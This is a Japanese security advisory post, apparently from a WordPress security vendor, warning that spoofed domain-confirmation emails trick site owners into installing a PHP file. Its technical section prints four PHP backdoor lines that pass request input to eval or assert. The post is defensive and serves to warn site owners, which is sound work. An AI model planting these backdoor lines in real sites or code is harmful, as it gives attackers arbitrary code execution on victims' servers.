偽のドメイン確認メールを信用しないでください
Web サイト上で PHP コードの作成、ダウンロード、またはインストールを要求するあらゆる種類の手紙を受け取った場合は、無視してください。
English version: Do not trust those fake domain confirmation emails
最近、私のクライアントの中には、ドメイン登録業者から奇妙な電子メールを受け取った人もいます。これらの手紙には、独自の確認ドメインのリクエストが含まれています。私はそれらの手紙の 1 つを確認し、それが詐欺的な手紙であることをすぐに特定しました。すべての文字は同一のパターンを持ち、特定の名前と指定された内容を持つ Web サイトのルート フォルダーに PHP ファイルを作成するというリクエストを含んでいます。言うまでもなく、その PHP ファイルの推奨コンテンツには、バックドア コードと呼ばれる悪意のあるコードが含まれています。この種のコードを使用すると、攻撃者は被害者の Web サイトで任意のアクションを実行できます。
Web サイト上で PHP コードの作成、ダウンロード、またはインストールを要求するあらゆる種類の手紙を受け取った場合は、無視してください。例外なく。たとえその手紙が社長やお母さんから来たとしても。
正当なFrom 電子メール アドレスがあるため、詐欺的な手紙は正当なもののように見えます。しかし、それはなりすましメールです。友人やドメイン登録業者から偽の電子メールを受け取ることは期待できません。右?いいえ!どの電子メールレターにも、任意のFrom 電子メール アドレスを含めることができます。大多数の電子メール サーバーと電子メール クライアントは、送信者アドレスをチェックまたは検証しません。つまり、ハッカーが望んでいたものだと考えられます。既知の送信者から受け取った電子メール レターに、Web サイトやコンピューター上のアプリケーションにコードをインストールするなど、不審なアクションを要求する内容が含まれている場合は、信頼してはいけません。
技術的な詳細
偽の電子メールには通常、次の PHP 行の一部が含まれています。
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
参考:base64_decode、eval、およびassertは、疑わしいまたは悪意のあるPHPコードのよく知られたマーカーです。
WP Cerber Security 8.5.8
マルウェア スキャナーの問題のトラブルシューティング
I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.